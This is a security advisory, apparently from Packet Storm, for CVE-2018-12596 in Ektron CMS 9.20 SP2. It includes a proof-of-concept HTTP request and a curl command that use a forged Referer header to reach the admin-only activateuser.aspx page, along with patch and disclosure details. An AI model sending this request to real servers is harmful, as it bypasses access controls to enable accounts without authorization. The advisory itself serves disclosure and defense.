what you don't know can hurt you

Ektron CMS 9.20 SP2 Improper Access Restrictions

Ektron CMS 9.20 SP2 Improper Access Restrictions
Posted Oct 10, 2018
Authored by Alt3kx

Ektron CMS version 9.20 SP2 suffers from an improper access restriction vulnerability.

tags | exploit
advisories | CVE-2018-12596
MD5 | ca4ad2f1e7feda0dfa0819e60cce4e6b

Ektron CMS 9.20 SP2 Improper Access Restrictions

Change Mirror Download
Details
================
Software: Ektron Content Management System (CMS)
Version: 9.20 SP2
Homepage: https://www.episerver.com
Advisory report: https://github.com/alt3kx/CVE-2018-12596
CVE: CVE-2018-12596
CVSS: 7.5 (HIGH: (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CWE-284

Description
================
Ektron CMS 9.20 SP2 allows remote attackers to enable users.

Vulnerability
================
Ektron CMS 9.20 SP2 allows remote attackers to call aspx pages via the "activateuser.aspx" page, even if a page
is located under the /WorkArea/ path, which is forbidden (normally available exclusively for local admins).

Proof of concept Exploit
========================

Pre-requisites:

- curl command deployed (Windows or Linux)
- Burpsuite Free/Pro deployed or any other WebProxy to catch/send GET request

Step (1): Launch the BurpSuite with default paramenter then request the follwing URL:

Target: https://ektronserver.com/WorkArea/activateuser.aspx

Normally you will see a 403 Forbidden: Access denied.

Step (2): Into BurpSuite Free/Pro add the following extra Header Referer:

"Referer: ALEX;"

Step (3): The offending GET request is:

GET /WorkArea/activateuser.aspx HTTP/1.1
Host: ektronserver.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Referer: ALEX;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Step (4): Test your GET request using curl command and burpsuite as following:

# curl -i -s -k -XGET "https://ektronserver.com/WorkArea/activateuser.aspx"
-H "Host: ektronserver.com"
-H "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
-H "Referer: ALEX;"
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
-H "Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate"
-H "Connection: close"
--proxy http://127.0.0.1:8080

You should see now the following response 200 OK!:

HTTP/1.0 200 Connection established

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8

Now you got access to enable users, just send the repeat request into the browser using burpsuite

Have fun!

Mitigations
================
Install the latest patches available here:

PATCH ID: EKTR-508: Security enhancement for re-enabling a user
https://support.episerver.com/hc/en-us/articles/115002828112-9-2-SP2-Site-Update

Any of the below should fix CVE-2018-12596

9.3(main release)
9.2 SP2 Site CU 22
9.1 SP3 Site CU 45
9.0 SP3 Site CU 31

Disclosure policy
================
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.

This vulnerability will be published if we do not receive a response to this report with 10 days.

Timeline
================
2018a06a08: Discovered
2018a06a11: Retest staging environment
2018a06a12: Restes live environment
2018a06a19: Internal communication
2018a06a21: Vendor notification
2018a06a21: Vendor feedback
2018a06a29: Vendor feedback product will be patched
2018a06a29: Patch available
2018a06a29: Agrements with the vendor to publish the CVE/Advisory.
2018a07a30: Internal communication
2018a09a15: Patches tested on LAB environment.
2018a10a08: Public report

Discovered by:
Alex Hernandez aka alt3kx:
================
Please visit https://github.com/alt3kx for more information.
My current exploit list @exploit-db: https://www.exploit-db.com/author/?a=1074


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    15 Files
  • 22
    Feb 22nd
    2 Files
  • 23
    Feb 23rd
    2 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close